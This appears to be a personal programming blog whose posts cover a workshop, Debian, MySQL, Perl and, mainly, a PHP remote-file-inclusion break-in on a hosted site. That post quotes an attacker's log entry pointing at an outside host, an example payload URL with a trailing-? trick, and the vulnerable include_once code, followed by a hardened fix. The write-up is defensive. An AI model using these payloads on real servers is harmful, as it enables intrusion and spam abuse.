WARNING!!! As this site contains photos of artworks, such as Michelangelo's David statue, which were classified as Indecent Articles by the Government of the Hong Kong Special Administrative Region, people under 18 are not allowed to enter this site.

23 March, 2008

Taking part in the Impromptu Code Jam

Filed under: Computer, Life, Programming — wanleung @ 1:21 am

On 19 March I attended the workshop run by Agile Hong Kong to try out pair programming.

Afterwards thirteen of us, old colleagues and the organisers, went for dinner together. By the time I got home it was 1:30 am.

I think this kind of workshop is worthwhile: besides learning different things, you also get to know quite a few people in the industry.

Also, I had not done this kind of problem-solving exercise for a long time; after finishing it my mind felt a lot clearer, a feeling I had not had in ages.

I had been to quite a few technical meetups before, but this was the first one that required actually writing code.

As for the programming problem, I finished it afterwards in about 5 minutes with 20 lines of Perl, but the answers I got were 2531 and 5683, and that is with words being handled. Excluding numbers, the answers come out as 2534 and 5691, which still differ from the 2530 and 5680 they gave.

22 March, 2008

Upgrading Debian to lenny (testing)

Filed under: Computer, Debian, Life, Linux, Programming — wanleung @ 1:00 am

I have finally upgraded the Debian on my workstation and laptop at home to the testing version.

GNOME is somewhat faster than before, and the fonts are two sizes smaller than before; this should fix the problem in the previous version where, although the font size was set the same, fonts in GNOME appeared larger than in KDE.

The testing version also adds a boot animation.

Other features are still being tested.

17 February, 2007

Security Issue in PHP - include_once

Filed under: Computer, Linux, Programming — wanleung @ 7:55 pm

There was an interesting hack of one client's account on our web hosting service. The client's site is an online library system written in PHP. One day the system admin reported that postfix had died because of the large amount of spam mail being sent from the online library system. When I checked the log (Squid access-log format: timestamp, duration, client, result/status, bytes, method, URL) I saw entries like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I went to the PHP file I saw how the cracker had broken into the system. The problem is in the PHP:

<?php
...
$pagename =$_GET['Name'];

?>

<?php include_once("{$pagename}_main.inc"); ?>

The problem is that $pagename is used without any guard on the value obtained from $_GET['Name'].

include_once (like include) can also pull its source from a remote URL such as http://example.com/aaa.php, provided PHP is configured to allow it (allow_url_fopen on PHP before 5.2; the separate allow_url_include setting, off by default, from PHP 5.2 on).

So when the cracker supplies 'http://example.org/aaa.txt?' as the name, via the URL http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

$pagename becomes http://example.org/aaa.txt? and the include_once call executes as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

Because of the trailing ?, the appended _main.inc becomes the query string of the request to example.org rather than part of the file name, so that server returns aaa.txt unchanged and PHP runs whatever script it contains (here, the one that was sending the spam) on the hosting server. This is a remote file inclusion hole in the system.

So, for security, if you must call include_once or include with a dynamic file name, check that the value comes from the place you expect before including it: compare it against a fixed list of page names rather than passing the request value through. Turning off allow_url_include (or allow_url_fopen on older PHP) stops the remote fetch, but an unchecked value can still be pointed at local files, so the check is needed in any case.
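One way to close this hole is to stop using the request value as a path at all and instead look it up in a fixed list of page names. The following is an added example written for this page, not the post's own code or the client's library system; the page names, the pages/ directory and the resolve_page helper are assumptions made for the example:

```php
<?php
declare(strict_types=1);

// Added example, not code from the original post or from the client's library
// system. It shows a hardened replacement for the vulnerable pattern
//     $pagename = $_GET['Name'];
//     include_once("{$pagename}_main.inc");
// The page names and the pages/ directory are assumptions for this example.

// The request value is only ever used as a key into this map; it never
// becomes part of a path or URL itself.
const PAGE_MAP = [
    'home'   => 'home_main.inc',
    'search' => 'search_main.inc',
    'books'  => 'books_main.inc',
];

/**
 * Map a request-supplied page name to a file under $baseDir, or return null
 * when it is not an allowlisted page or the file is missing / outside $baseDir.
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;                        // URLs, "../", null bytes: all rejected here
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MAP[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir,
    // so a mistake in PAGE_MAP cannot include something elsewhere.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        fwrite(STDERR, "FAILED: $what\n");
        exit(1);
    }
}

if (PHP_SAPI === 'cli') {
    // Self-check: a throwaway pages/ directory with one stub page in it.
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home_main.inc', "<?php echo \"home page\\n\";\n");

    check(resolve_page('http://example.org/aaa.txt?', $dir) === null, 'remote URL rejected');
    check(resolve_page('../../etc/passwd', $dir) === null, 'path traversal rejected');
    check(resolve_page('books', $dir) === null, 'allowlisted name whose file is missing');
    check(resolve_page('home', $dir) !== null, 'real page resolves');

    include_once resolve_page('home', $dir);   // the only include that can happen
    unlink($dir . '/home_main.inc');
    rmdir($dir);
    echo "all checks passed\n";
} else {
    // Web entry point: same lookup, never the raw request value.
    $file = resolve_page($_GET['Name'] ?? 'home', __DIR__ . '/pages');
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include_once $file;
}
```

Run it with php on the command line to exercise the checks against the attack value from the post; under a web server it serves the allowlisted page or returns 404. Disabling allow_url_include (or allow_url_fopen on PHP older than 5.2) is worth doing as well, but the lookup is what actually removes the hole, because the request value never reaches include_once.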

12 June, 2006

Install Perl CPAN Modules in Debian

Filed under: Computer, Debian, Linux, Programming — wanleung @ 12:30 pm

Use deb packages rather than building from source:
http://www.debian-administration.org/articles/78

23 December, 2005

MySQL

Filed under: Computer, Programming — wanleung @ 2:43 pm

grant update, insert, delete, select on *.* to user@host identified by 'passwd';
flush privileges;

Note that *.* grants these rights on every database; restrict it to the database the account actually needs (dbname.*). On MySQL 8.0 and later, IDENTIFIED BY is no longer accepted in GRANT, so create the account with CREATE USER first and then GRANT.

1 December, 2005

Decode Base64 mail

Filed under: Computer, Linux, Programming — wanleung @ 6:32 pm

perl -MMIME::Base64 -le '$/=undef;print decode_base64( <> )' foo

($/=undef slurps the whole of file foo at once, so the Base64 body is decoded as one block rather than line by line.)

31 January, 2005

Final Year Project

Filed under: Computer, Programming — wanleung @ 3:44 pm

I am trying my best to finish my final year project these days.
My final year project is about cryptography.
I need to write at least 3 small programs to show how DES, RSA, and MD5 work.

I am still programming the DES and MD5. I need time…

Just so tired, and haven't slept for a few days…